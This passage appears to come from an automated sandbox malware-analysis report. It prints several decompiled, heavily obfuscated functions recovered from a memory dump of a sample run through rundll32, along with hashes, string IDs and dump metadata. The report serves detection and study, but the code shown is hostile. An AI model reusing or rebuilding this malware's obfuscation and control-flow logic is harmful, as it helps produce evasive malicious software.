                                                                                                                          				_v188 = _v188 + 0xffff9444;
                                                                                                                          				_t210 = 0x2f;
                                                                                                                          				_v188 = _v188 / _t210;
                                                                                                                          				_v188 = _v188 ^ 0x000ac4b2;
                                                                                                                          				_v176 = 0xa783cc;
                                                                                                                          				_v176 = _v176 << 0xa;
                                                                                                                          				_v176 = _v176 ^ 0x73295065;
                                                                                                                          				_v176 = _v176 ^ 0xed239367;
                                                                                                                          				_v148 = 0x42262a;
                                                                                                                          				_v148 = _v148 | 0x228e56d6;
                                                                                                                          				_v148 = _v148 ^ 0x22cd87d0;
                                                                                                                          				_v204 = 0xc47428;
                                                                                                                          				_v204 = _v204 + 0xffff2e33;
                                                                                                                          				_v204 = _v204 + 0xffff2fa2;
                                                                                                                          				_v204 = _v204 + 0xffff28a7;
                                                                                                                          				_v204 = _v204 ^ 0x00c63754;
                                                                                                                          				_v156 = 0x11bd56;
                                                                                                                          				_t211 = 0x5c;
                                                                                                                          				_v156 = _v156 * 0x6a;
                                                                                                                          				_v156 = _v156 ^ 0x0752342f;
                                                                                                                          				_v172 = 0x489beb;
                                                                                                                          				_v172 = _v172 + 0xfe21;
                                                                                                                          				_v172 = _v172 / _t211;
                                                                                                                          				_v172 = _v172 ^ 0x0000a4d4;
                                                                                                                          				_v192 = 0x2e5859;
                                                                                                                          				_v192 = _v192 ^ 0x83ba67d9;
                                                                                                                          				_t212 = 0x44;
                                                                                                                          				_v192 = _v192 / _t212;
                                                                                                                          				_v192 = _v192 ^ 0x01e00d99;
                                                                                                                          				_v180 = 0x89bc6d;
                                                                                                                          				_v180 = _v180 | 0xb1d25d45;
                                                                                                                          				_v180 = _v180 << 0xe;
                                                                                                                          				_v180 = _v180 ^ 0xff5cc309;
                                                                                                                          				_v168 = 0x19805c;
                                                                                                                          				_t213 = 0x18;
                                                                                                                          				_v168 = _v168 * 0x16;
                                                                                                                          				_v168 = _v168 ^ 0x4d2845a5;
                                                                                                                          				_v168 = _v168 ^ 0x4f1adce1;
                                                                                                                          				_v196 = 0x9cfdcd;
                                                                                                                          				_v196 = _v196 / _t213;
                                                                                                                          				_v196 = _v196 + 0xd8a6;
                                                                                                                          				_v196 = _v196 ^ 0x0005e56c;
                                                                                                                          				_v200 = 0x1d77da;
                                                                                                                          				_t214 = 0x6b;
                                                                                                                          				_v200 = _v200 / _t214;
                                                                                                                          				_t215 = 9;
                                                                                                                          				_v200 = _v200 / _t215;
                                                                                                                          				_t216 = 0x59;
                                                                                                                          				_v200 = _v200 / _t216;
                                                                                                                          				_v200 = _v200 ^ 0x00052bad;
                                                                                                                          				_v184 = 0x474669;
                                                                                                                          				_v184 = _v184 * 0x25;
                                                                                                                          				_v184 = _v184 + 0xffff8141;
                                                                                                                          				_v184 = _v184 ^ 0x0a4cf000;
                                                                                                                          				_v160 = 0x98ddfb;
                                                                                                                          				_v160 = _v160 << 3;
                                                                                                                          				_v160 = _v160 ^ 0x04cf55b1;
                                                                                                                          				_v152 = 0xbbc225;
                                                                                                                          				_v152 = _v152 * 0x58;
                                                                                                                          				_v152 = _v152 ^ 0x408ec409;
                                                                                                                          				while(_t183 != 0x4a2a3c4) {
                                                                                                                          					if(_t183 == 0x640e5f9) {
                                                                                                                          						__eflags = _v128;
                                                                                                                          						_t189 =  &_v128;
                                                                                                                          						while(__eflags != 0) {
                                                                                                                          							_t178 =  *_t189;
                                                                                                                          							__eflags = _t178 - 0x30;
                                                                                                                          							if(_t178 < 0x30) {
                                                                                                                          								L10:
                                                                                                                          								__eflags = _t178 - 0x61;
                                                                                                                          								if(_t178 < 0x61) {
                                                                                                                          									L12:
                                                                                                                          									__eflags = _t178 - 0x41;
                                                                                                                          									if(_t178 < 0x41) {
                                                                                                                          										L14:
                                                                                                                          										 *_t189 = 0x58;
                                                                                                                          									} else {
                                                                                                                          										__eflags = _t178 - 0x5a;
                                                                                                                          										if(_t178 > 0x5a) {
                                                                                                                          											goto L14;
                                                                                                                          										}
                                                                                                                          									}
                                                                                                                          								} else {
                                                                                                                          									__eflags = _t178 - 0x7a;
                                                                                                                          									if(_t178 > 0x7a) {
                                                                                                                          										goto L12;
                                                                                                                          									}
                                                                                                                          								}
                                                                                                                          							} else {
                                                                                                                          								__eflags = _t178 - 0x39;
                                                                                                                          								if(_t178 > 0x39) {
                                                                                                                          									goto L10;
                                                                                                                          								}
                                                                                                                          							}
                                                                                                                          							_t189 = _t189 + 1;
                                                                                                                          							__eflags =  *_t189;
                                                                                                                          						}
                                                                                                                          						_t183 = 0x4a2a3c4;
                                                                                                                          						continue;
                                                                                                                          					} else {
                                                                                                                          						if(_t183 == 0x7562914) {
                                                                                                                          							_v144 = 0x80;
                                                                                                                          							_t178 = E0079CD29(_v164,  &_v144, _v176,  &_v128);
                                                                                                                          							_t220 =  &(_t220[3]);
                                                                                                                          							_t183 = 0x640e5f9;
                                                                                                                          							continue;
                                                                                                                          						} else {
                                                                                                                          							if(_t183 == 0xf669bfa) {
                                                                                                                          								_t183 = 0x7562914;
                                                                                                                          								continue;
                                                                                                                          							}
                                                                                                                          						}
                                                                                                                          					}
                                                                                                                          					L18:
                                                                                                                          					__eflags = _t183 - 0x1718ff4;
                                                                                                                          					if(__eflags != 0) {
                                                                                                                          						continue;
                                                                                                                          					}
                                                                                                                          					return _t178;
                                                                                                                          				}
                                                                                                                          				_push(_v172);
                                                                                                                          				_push(_v156);
                                                                                                                          				_push(_v204);
                                                                                                                          				_t174 = E007A8606(_v148, 0x791690, __eflags);
                                                                                                                          				E00792206( &_v128, _t209, _v196, _v200, _t174, E0079EE81(__eflags), _v184);
                                                                                                                          				_t178 = E0079A8B0(_v160, _t174, _v152);
                                                                                                                          				_t220 =  &(_t220[0xb]);
                                                                                                                          				_t183 = 0x1718ff4;
                                                                                                                          				goto L18;
                                                                                                                          			}





































                                                                                                                          0x007a0293
                                                                                                                          0x007a02a8
                                                                                                                          0x007a02a9
                                                                                                                          0x007a02a9
                                                                                                                          0x007a02ae
                                                                                                                          0x00000000
                                                                                                                          0x007a023f
                                                                                                                          0x007a0241
                                                                                                                          0x007a0257
                                                                                                                          0x007a0271
                                                                                                                          0x007a0276
                                                                                                                          0x007a0279
                                                                                                                          0x00000000
                                                                                                                          0x007a0243
                                                                                                                          0x007a0249
                                                                                                                          0x007a024f
                                                                                                                          0x00000000
                                                                                                                          0x007a024f
                                                                                                                          0x007a0249
                                                                                                                          0x007a0241
                                                                                                                          0x007a030f
                                                                                                                          0x007a030f
                                                                                                                          0x007a0315
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x007a0325
                                                                                                                          0x007a0325
                                                                                                                          0x007a02b2
                                                                                                                          0x007a02bb
                                                                                                                          0x007a02bf
                                                                                                                          0x007a02c7
                                                                                                                          0x007a02f3
                                                                                                                          0x007a0302
                                                                                                                          0x007a0307
                                                                                                                          0x007a030a
                                                                                                                          0x00000000

                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447180476.0000000000791000.00000020.00000800.00020000.00000000.sdmp, Offset: 00790000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447175867.0000000000790000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                          • Associated: 00000009.00000002.447193918.00000000007B3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_790000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: *&B$YX.$eP)s$iFG${So
                                                                                                                          • API String ID: 0-3810143839
                                                                                                                          • Opcode ID: 48d2831e814e975817787d0fc3f0b7328e935c3bd0d47c2a6559cc3d7b45ea36
                                                                                                                          • Instruction ID: 1470164f7b01775f241155abe4c4230a8c5e0f5db4c8a1fa4ebec18eea187054
                                                                                                                          • Opcode Fuzzy Hash: 48d2831e814e975817787d0fc3f0b7328e935c3bd0d47c2a6559cc3d7b45ea36
                                                                                                                          • Instruction Fuzzy Hash: 028197B15093419BD7A8CF25D589A1FBBE2FBC6718F005A1DF185862A1D3B8C949CF83
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 90%
                                                                                                                          			E00797735(void* __edx, intOrPtr _a4, signed int* _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                                                                          				char _v44;
                                                                                                                          				void* _v56;
                                                                                                                          				intOrPtr _v60;
                                                                                                                          				signed int _v64;
                                                                                                                          				signed int _v68;
                                                                                                                          				signed int _v72;
                                                                                                                          				signed int _v76;
                                                                                                                          				signed int _v80;
                                                                                                                          				signed int _v84;
                                                                                                                          				signed int _v88;
                                                                                                                          				signed int _v92;
                                                                                                                          				signed int _v96;
                                                                                                                          				signed int _v100;
                                                                                                                          				signed int _v104;
                                                                                                                          				signed int _v108;
                                                                                                                          				unsigned int _v112;
                                                                                                                          				unsigned int _v116;
                                                                                                                          				signed int _v120;
                                                                                                                          				signed int _v124;
                                                                                                                          				signed int _v128;
                                                                                                                          				signed int _v132;
                                                                                                                          				signed int _v136;
                                                                                                                          				void* __ecx;
                                                                                                                          				void* _t163;
                                                                                                                          				signed int _t176;
                                                                                                                          				void* _t188;
                                                                                                                          				signed int _t205;
                                                                                                                          				signed int* _t207;
                                                                                                                          				void* _t209;
                                                                                                                          				void* _t210;
                                                                                                                          
                                                                                                                          				_t186 = _a4;
                                                                                                                          				_t207 = _a8;
                                                                                                                          				_push(_a16);
                                                                                                                          				_push(_a12);
                                                                                                                          				_push(_t207);
                                                                                                                          				_push(_a4);
                                                                                                                          				_push(__edx);
                                                                                                                          				E007A20B9(_t163);
                                                                                                                          				_v60 = 0x524796;
                                                                                                                          				_t210 = _t209 + 0x18;
                                                                                                                          				asm("stosd");
                                                                                                                          				_t188 = 0x9c25eae;
                                                                                                                          				asm("stosd");
                                                                                                                          				asm("stosd");
                                                                                                                          				_v76 = 0x29f01;
                                                                                                                          				_v76 = _v76 | 0x94be009d;
                                                                                                                          				_v76 = _v76 ^ 0x94be9f9d;
                                                                                                                          				_v108 = 0xafa956;
                                                                                                                          				_v108 = _v108 + 0x628;
                                                                                                                          				_v108 = _v108 ^ 0xf539d3de;
                                                                                                                          				_v108 = _v108 ^ 0xf5927b2e;
                                                                                                                          				_v92 = 0x300c11;
                                                                                                                          				_v92 = _v92 ^ 0x95f7d427;
                                                                                                                          				_v92 = _v92 ^ 0x95c19bc8;
                                                                                                                          				_v116 = 0x7fd72e;
                                                                                                                          				_v116 = _v116 >> 0x10;
                                                                                                                          				_v116 = _v116 + 0x5d9b;
                                                                                                                          				_v116 = _v116 ^ 0x0001fda4;
                                                                                                                          				_v88 = 0x25a82f;
                                                                                                                          				_t205 = 0x1b;
                                                                                                                          				_v88 = _v88 * 0x72;
                                                                                                                          				_v88 = _v88 ^ 0x10cad58f;
                                                                                                                          				_v100 = 0xf91ce5;
                                                                                                                          				_v100 = _v100 >> 0xc;
                                                                                                                          				_v100 = _v100 ^ 0x71d91e41;
                                                                                                                          				_v100 = _v100 ^ 0x71d9c87d;
                                                                                                                          				_v136 = 0x5a524;
                                                                                                                          				_v136 = _v136 ^ 0x65d544fc;
                                                                                                                          				_v136 = _v136 / _t205;
                                                                                                                          				_v136 = _v136 + 0xdad4;
                                                                                                                          				_v136 = _v136 ^ 0x03c43220;
                                                                                                                          				_v68 = 0xd5537a;
                                                                                                                          				_v68 = _v68 + 0xffffd52f;
                                                                                                                          				_v68 = _v68 ^ 0x00d2b66c;
                                                                                                                          				_v128 = 0x59397b;
                                                                                                                          				_v128 = _v128 ^ 0x5dfc0cc3;
                                                                                                                          				_v128 = _v128 + 0x56f6;
                                                                                                                          				_v128 = _v128 + 0xff83;
                                                                                                                          				_v128 = _v128 ^ 0x5dafd3d4;
                                                                                                                          				_v104 = 0x85edfa;
                                                                                                                          				_v104 = _v104 | 0x32b3baf7;
                                                                                                                          				_v104 = _v104 ^ 0x32b12396;
                                                                                                                          				_v112 = 0x4c4fc6;
                                                                                                                          				_v112 = _v112 + 0xbf9f;
                                                                                                                          				_v112 = _v112 >> 1;
                                                                                                                          				_v112 = _v112 ^ 0x002f2047;
                                                                                                                          				_v120 = 0xc21a43;
                                                                                                                          				_v120 = _v120 | 0x0781619f;
                                                                                                                          				_v120 = _v120 ^ 0x30a197e6;
                                                                                                                          				_v120 = _v120 ^ 0x376a3e6d;
                                                                                                                          				_v84 = 0xaf6a80;
                                                                                                                          				_v84 = _v84 + 0xffff12f3;
                                                                                                                          				_v84 = _v84 ^ 0x00ae6f5f;
                                                                                                                          				_v64 = 0x7bdfb0;
                                                                                                                          				_v64 = _v64 >> 2;
                                                                                                                          				_v64 = _v64 ^ 0x00114c08;
                                                                                                                          				_v96 = 0x6b35de;
                                                                                                                          				_v96 = _v96 * 0x60;
                                                                                                                          				_v96 = _v96 ^ 0x283b6418;
                                                                                                                          				_v124 = 0x52b9d2;
                                                                                                                          				_v124 = _v124 | 0x40c5122c;
                                                                                                                          				_v124 = _v124 << 8;
                                                                                                                          				_v124 = _v124 >> 0x10;
                                                                                                                          				_v124 = _v124 ^ 0x0001910d;
                                                                                                                          				_v132 = 0x44d0f9;
                                                                                                                          				_v132 = _v132 * 0x29;
                                                                                                                          				_v132 = _v132 + 0xf17;
                                                                                                                          				_v132 = _v132 * 0x65;
                                                                                                                          				_v132 = _v132 ^ 0x592f3fb2;
                                                                                                                          				_v72 = 0xc75ad6;
                                                                                                                          				_v72 = _v72 ^ 0xe0bef3a1;
                                                                                                                          				_v72 = _v72 ^ 0xe072572c;
                                                                                                                          				_v80 = 0xa6c1d6;
                                                                                                                          				_v80 = _v80 + 0xc8d;
                                                                                                                          				_v80 = _v80 ^ 0x00ac29a9;
                                                                                                                          				do {
                                                                                                                          					while(_t188 != 0xe27b71) {
                                                                                                                          						if(_t188 == 0x372e88b) {
                                                                                                                          							_push(_t188);
                                                                                                                          							_push(_t188);
                                                                                                                          							_t176 = E00797FF2(_t207[1]);
                                                                                                                          							 *_t207 = _t176;
                                                                                                                          							__eflags = _t176;
                                                                                                                          							if(__eflags != 0) {
                                                                                                                          								_t188 = 0xe27b71;
                                                                                                                          								continue;
                                                                                                                          							}
                                                                                                                          						} else {
                                                                                                                          							if(_t188 == 0x93f98fe) {
                                                                                                                          								_t207[1] = E007B0C14(_t186);
                                                                                                                          								_t188 = 0x372e88b;
                                                                                                                          								continue;
                                                                                                                          							} else {
                                                                                                                          								if(_t188 == 0x9c25eae) {
                                                                                                                          									_t188 = 0x93f98fe;
                                                                                                                          									 *_t207 =  *_t207 & 0x00000000;
                                                                                                                          									_t207[1] = _v76;
                                                                                                                          									continue;
                                                                                                                          								} else {
                                                                                                                          									if(_t188 == 0xa0c9f29) {
                                                                                                                          										_t146 =  &_v112; // 0x2f2047
                                                                                                                          										E007A0DAF(_v68,  &_v44, _v128,  *((intOrPtr*)(_t186 + 0x48)), _v104,  *_t146);
                                                                                                                          										_t210 = _t210 + 0x10;
                                                                                                                          										_t188 = 0xc7f60b3;
                                                                                                                          										continue;
                                                                                                                          									} else {
                                                                                                                          										if(_t188 == 0xc7f60b3) {
                                                                                                                          											_t144 =  &_v84; // 0xe072572c
                                                                                                                          											E007B0E3A( &_v44, _v120, __eflags,  *_t144, _v64, _v96, _t186 + 0x14);
                                                                                                                          											_t210 = _t210 + 0x10;
                                                                                                                          											_t188 = 0xcf8cba1;
                                                                                                                          											continue;
                                                                                                                          										} else {
                                                                                                                          											_t219 = _t188 - 0xcf8cba1;
                                                                                                                          											if(_t188 != 0xcf8cba1) {
                                                                                                                          												goto L17;
                                                                                                                          											} else {
                                                                                                                          												E007B0E3A( &_v44, _v124, _t219, _v132, _v72, _v80, _t186 + 0x38);
                                                                                                                          											}
                                                                                                                          										}
                                                                                                                          									}
                                                                                                                          								}
                                                                                                                          							}
                                                                                                                          						}
                                                                                                                          						L9:
                                                                                                                          						return 0 |  *_t207 != 0x00000000;
                                                                                                                          					}
                                                                                                                          					E00793DBC( &_v44, _t207, _v88, _v100, _v136);
                                                                                                                          					_t210 = _t210 + 0xc;
                                                                                                                          					_t188 = 0xa0c9f29;
                                                                                                                          					L17:
                                                                                                                          					__eflags = _t188 - 0x560a718;
                                                                                                                          				} while (__eflags != 0);
                                                                                                                          				goto L9;
                                                                                                                          			}


































                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447180476.0000000000791000.00000020.00000800.00020000.00000000.sdmp, Offset: 00790000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447175867.0000000000790000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                          • Associated: 00000009.00000002.447193918.00000000007B3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_790000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: ,Wr$G /$m>j7$q{${9Y
                                                                                                                          • API String ID: 0-2956538602
                                                                                                                          • Opcode ID: aad4c5470bf923e8e08ddaad0ee87e401980107f56092e5079a3be882124f178
                                                                                                                          • Instruction ID: 0f81449b36d477e15feed3c0195c0f8bf8f103a98d9edd8963ef77e8bd69e616
                                                                                                                          • Opcode Fuzzy Hash: aad4c5470bf923e8e08ddaad0ee87e401980107f56092e5079a3be882124f178
                                                                                                                          • Instruction Fuzzy Hash: 89913E711093419FD768CF65E98A52BBBE1FBC4718F10991CF29296220D3B9CA49CF83
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 91%
                                                                                                                          			E00794816(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                                                                          				signed int _v4;
                                                                                                                          				intOrPtr _v8;
                                                                                                                          				intOrPtr _v12;
                                                                                                                          				intOrPtr _v16;
                                                                                                                          				char _v20;
                                                                                                                          				signed int _v24;
                                                                                                                          				signed int _v28;
                                                                                                                          				signed int _v32;
                                                                                                                          				signed int _v36;
                                                                                                                          				signed int _v40;
                                                                                                                          				signed int _v44;
                                                                                                                          				signed int _v48;
                                                                                                                          				signed int _v52;
                                                                                                                          				signed int _v56;
                                                                                                                          				signed int _v60;
                                                                                                                          				signed int _v64;
                                                                                                                          				signed int _v68;
                                                                                                                          				signed int _v72;
                                                                                                                          				signed int _v76;
                                                                                                                          				signed int _v80;
                                                                                                                          				signed int _v84;
                                                                                                                          				signed int _v88;
                                                                                                                          				void* _t164;
                                                                                                                          				void* _t179;
                                                                                                                          				signed int _t190;
                                                                                                                          				signed int _t191;
                                                                                                                          				signed int _t192;
                                                                                                                          				signed int _t193;
                                                                                                                          				void* _t196;
                                                                                                                          				void* _t213;
                                                                                                                          				void* _t214;
                                                                                                                          				signed int* _t217;
                                                                                                                          
                                                                                                                          				_push(_a16);
                                                                                                                          				_t213 = __edx;
                                                                                                                          				_push(_a12);
                                                                                                                          				_push(_a8);
                                                                                                                          				_push(_a4);
                                                                                                                          				_push(__edx);
                                                                                                                          				_push(__ecx);
                                                                                                                          				E007A20B9(_t164);
                                                                                                                          				_v4 = _v4 & 0x00000000;
                                                                                                                          				_t217 =  &(( &_v88)[6]);
                                                                                                                          				_v16 = 0xc0a747;
                                                                                                                          				_v12 = 0xade381;
                                                                                                                          				_t214 = 0;
                                                                                                                          				_v8 = 0x11050f;
                                                                                                                          				_t196 = 0x5adc597;
                                                                                                                          				_v84 = 0xdf9e69;
                                                                                                                          				_v84 = _v84 >> 2;
                                                                                                                          				_v84 = _v84 + 0xffff5795;
                                                                                                                          				_v84 = _v84 >> 5;
                                                                                                                          				_v84 = _v84 ^ 0x0001b9f8;
                                                                                                                          				_v68 = 0xf2d8cd;
                                                                                                                          				_v68 = _v68 << 6;
                                                                                                                          				_v68 = _v68 | 0xe3b79c6a;
                                                                                                                          				_v68 = _v68 + 0xec5a;
                                                                                                                          				_v68 = _v68 ^ 0xffb8abc5;
                                                                                                                          				_v40 = 0x5d8c34;
                                                                                                                          				_v40 = _v40 >> 9;
                                                                                                                          				_v40 = _v40 ^ 0x40002ec6;
                                                                                                                          				_v28 = 0x37ca39;
                                                                                                                          				_v28 = _v28 | 0x456668c2;
                                                                                                                          				_v28 = _v28 ^ 0x0577eafb;
                                                                                                                          				_v80 = 0xd16358;
                                                                                                                          				_v80 = _v80 ^ 0xe637ce9d;
                                                                                                                          				_t190 = 0x68;
                                                                                                                          				_v80 = _v80 * 0x4b;
                                                                                                                          				_v80 = _v80 << 2;
                                                                                                                          				_v80 = _v80 ^ 0x965c2e63;
                                                                                                                          				_v56 = 0xfc1806;
                                                                                                                          				_v56 = _v56 + 0xffffb57d;
                                                                                                                          				_v56 = _v56 | 0x299c1b97;
                                                                                                                          				_v56 = _v56 ^ 0x29fc2736;
                                                                                                                          				_v44 = 0x81586;
                                                                                                                          				_v44 = _v44 | 0xba5390c4;
                                                                                                                          				_v44 = _v44 ^ 0xba584850;
                                                                                                                          				_v60 = 0x52e6aa;
                                                                                                                          				_v60 = _v60 >> 0xa;
                                                                                                                          				_v60 = _v60 * 0x28;
                                                                                                                          				_v60 = _v60 ^ 0x00066c4e;
                                                                                                                          				_v48 = 0x7a334;
                                                                                                                          				_v48 = _v48 + 0xfffff5af;
                                                                                                                          				_v48 = _v48 ^ 0x0009652d;
                                                                                                                          				_v52 = 0x3bf8e8;
                                                                                                                          				_v52 = _v52 / _t190;
                                                                                                                          				_v52 = _v52 ^ 0x00025bcb;
                                                                                                                          				_v64 = 0xacc490;
                                                                                                                          				_t191 = 0x6f;
                                                                                                                          				_v64 = _v64 / _t191;
                                                                                                                          				_v64 = _v64 ^ 0xce7acdce;
                                                                                                                          				_v64 = _v64 ^ 0xce756fa5;
                                                                                                                          				_v88 = 0x557b83;
                                                                                                                          				_v88 = _v88 ^ 0xfc4fd146;
                                                                                                                          				_v88 = _v88 ^ 0x87bb4e9a;
                                                                                                                          				_v88 = _v88 ^ 0x18fbc6ce;
                                                                                                                          				_v88 = _v88 ^ 0x635c68ef;
                                                                                                                          				_v24 = 0xa24557;
                                                                                                                          				_t192 = 0x23;
                                                                                                                          				_v24 = _v24 / _t192;
                                                                                                                          				_v24 = _v24 ^ 0x00019ec3;
                                                                                                                          				_v72 = 0x274d3f;
                                                                                                                          				_v72 = _v72 + 0x3236;
                                                                                                                          				_v72 = _v72 + 0x71a1;
                                                                                                                          				_v72 = _v72 + 0x1749;
                                                                                                                          				_v72 = _v72 ^ 0x0028bc49;
                                                                                                                          				_v32 = 0x96c762;
                                                                                                                          				_t193 = 0x44;
                                                                                                                          				_v32 = _v32 / _t193;
                                                                                                                          				_v32 = _v32 ^ 0x000b5918;
                                                                                                                          				_v76 = 0x2f082c;
                                                                                                                          				_v76 = _v76 + 0x52f3;
                                                                                                                          				_v76 = _v76 + 0x7ae4;
                                                                                                                          				_v76 = _v76 ^ 0x81d2744f;
                                                                                                                          				_v76 = _v76 ^ 0x81f68fa5;
                                                                                                                          				_v36 = 0x9357ce;
                                                                                                                          				_v36 = _v36 + 0xfffffb26;
                                                                                                                          				_v36 = _v36 ^ 0x009b03e6;
                                                                                                                          				do {
                                                                                                                          					while(_t196 != 0x4d42949) {
                                                                                                                          						if(_t196 == 0x5adc597) {
                                                                                                                          							_t196 = 0x4d42949;
                                                                                                                          							continue;
                                                                                                                          						} else {
                                                                                                                          							if(_t196 == 0x78e32ab) {
                                                                                                                          								E007A847F(_v24, _t213, _v28 | _v68, _v72, _a8, _v32, _t214, _v76, _v36,  &_v20);
                                                                                                                          							} else {
                                                                                                                          								if(_t196 != 0xf2775cd) {
                                                                                                                          									goto L11;
                                                                                                                          								} else {
                                                                                                                          									_push(_t196);
                                                                                                                          									_push(_t196);
                                                                                                                          									_t214 = E00797FF2(_v20 + _v20);
                                                                                                                          									if(_t214 != 0) {
                                                                                                                          										_t196 = 0x78e32ab;
                                                                                                                          										continue;
                                                                                                                          									}
                                                                                                                          								}
                                                                                                                          							}
                                                                                                                          						}
                                                                                                                          						L14:
                                                                                                                          						return _t214;
                                                                                                                          					}
                                                                                                                          					_t179 = E007A847F(_v80, _t213, _v40 | _v84, _v56, _a8, _v44, 0, _v60, _v48,  &_v20);
                                                                                                                          					_t217 =  &(_t217[8]);
                                                                                                                          					if(_t179 == 0) {
                                                                                                                          						_t196 = 0xc32537b;
                                                                                                                          						goto L11;
                                                                                                                          					} else {
                                                                                                                          						_t196 = 0xf2775cd;
                                                                                                                          						continue;
                                                                                                                          					}
                                                                                                                          					goto L14;
                                                                                                                          					L11:
                                                                                                                          				} while (_t196 != 0xc32537b);
                                                                                                                          				goto L14;
                                                                                                                          			}




































                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447180476.0000000000791000.00000020.00000800.00020000.00000000.sdmp, Offset: 00790000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447175867.0000000000790000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                          • Associated: 00000009.00000002.447193918.00000000007B3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_790000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: -e$62$?M'$h\c$z
                                                                                                                          • API String ID: 0-1842174784
                                                                                                                          • Opcode ID: 3bb5ab6fe4e144f6f9fa152f4c768ba037a2635da891751e18d7284d158d406f
                                                                                                                          • Instruction ID: e93e46f25e36b66f9bd8a9b80bad2c90beb704b34990ec439ee109982ef3eaed
                                                                                                                          • Opcode Fuzzy Hash: 3bb5ab6fe4e144f6f9fa152f4c768ba037a2635da891751e18d7284d158d406f
                                                                                                                          • Instruction Fuzzy Hash: DA812EB15093819FD7A8CF61D58991BBBF1FBD9758F408A0CF29586260D3B6CA098F42
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 94%
                                                                                                                          			E007ABE27(intOrPtr* __ecx) {
                                                                                                                          				signed int _v8;
                                                                                                                          				signed int _v12;
                                                                                                                          				signed int _v16;
                                                                                                                          				signed int _v20;
                                                                                                                          				signed int _v24;
                                                                                                                          				signed int _v28;
                                                                                                                          				signed int _v32;
                                                                                                                          				signed int _v36;
                                                                                                                          				signed int _v40;
                                                                                                                          				signed int _v44;
                                                                                                                          				signed int _v48;
                                                                                                                          				signed int _v52;
                                                                                                                          				signed int _v56;
                                                                                                                          				signed int _v60;
                                                                                                                          				char _v320;
                                                                                                                          				char _t133;
                                                                                                                          				signed int _t136;
                                                                                                                          				void* _t139;
                                                                                                                          				signed int _t141;
                                                                                                                          				signed int _t142;
                                                                                                                          				signed int _t143;
                                                                                                                          				char* _t144;
                                                                                                                          				intOrPtr* _t163;
                                                                                                                          				void* _t164;
                                                                                                                          
                                                                                                                          				_v40 = 0x365269;
                                                                                                                          				_v40 = _v40 >> 7;
                                                                                                                          				_v40 = _v40 ^ 0x00099806;
                                                                                                                          				_v16 = 0x620947;
                                                                                                                          				_v16 = _v16 + 0x25da;
                                                                                                                          				_v16 = _v16 | 0xf0dff1a3;
                                                                                                                          				_v16 = _v16 + 0xffff8fd5;
                                                                                                                          				_v16 = _v16 ^ 0xf0f65193;
                                                                                                                          				_v60 = 0x4a6911;
                                                                                                                          				_v60 = _v60 >> 2;
                                                                                                                          				_v60 = _v60 ^ 0x0015bfec;
                                                                                                                          				_v32 = 0xee641f;
                                                                                                                          				_v32 = _v32 ^ 0x54466854;
                                                                                                                          				_v32 = _v32 ^ 0x51df3278;
                                                                                                                          				_v32 = _v32 ^ 0x057124b2;
                                                                                                                          				_v36 = 0x2245a1;
                                                                                                                          				_t163 = __ecx;
                                                                                                                          				_t141 = 0x59;
                                                                                                                          				_v36 = _v36 / _t141;
                                                                                                                          				_t142 = 0x7c;
                                                                                                                          				_v36 = _v36 / _t142;
                                                                                                                          				_v36 = _v36 ^ 0x00022b59;
                                                                                                                          				_v52 = 0x17e728;
                                                                                                                          				_v52 = _v52 << 7;
                                                                                                                          				_v52 = _v52 ^ 0x0bfefc33;
                                                                                                                          				_v24 = 0x5a7c12;
                                                                                                                          				_v24 = _v24 + 0xffff6a30;
                                                                                                                          				_v24 = _v24 + 0xb9bd;
                                                                                                                          				_v24 = _v24 ^ 0x00522d4c;
                                                                                                                          				_v8 = 0x70b293;
                                                                                                                          				_v8 = _v8 ^ 0xb7f64013;
                                                                                                                          				_v8 = _v8 | 0x98950303;
                                                                                                                          				_v8 = _v8 << 0x10;
                                                                                                                          				_v8 = _v8 ^ 0xf38d6f21;
                                                                                                                          				_v28 = 0x5e48e6;
                                                                                                                          				_v28 = _v28 >> 2;
                                                                                                                          				_v28 = _v28 << 0xf;
                                                                                                                          				_v28 = _v28 ^ 0xc917f664;
                                                                                                                          				_v44 = 0xd34be4;
                                                                                                                          				_v44 = _v44 ^ 0x1af04c78;
                                                                                                                          				_v44 = _v44 ^ 0x1a25cf5b;
                                                                                                                          				_v56 = 0x13a2c8;
                                                                                                                          				_v56 = _v56 ^ 0x00107e6c;
                                                                                                                          				_v20 = 0x6acc1;
                                                                                                                          				_t143 = 0x48;
                                                                                                                          				_v20 = _v20 * 0x75;
                                                                                                                          				_v20 = _v20 | 0x5ce04716;
                                                                                                                          				_v20 = _v20 ^ 0xfe39b07b;
                                                                                                                          				_v20 = _v20 ^ 0xa1d6ae77;
                                                                                                                          				_v48 = 0x9d30cb;
                                                                                                                          				_t144 =  &_v320;
                                                                                                                          				_v48 = _v48 / _t143;
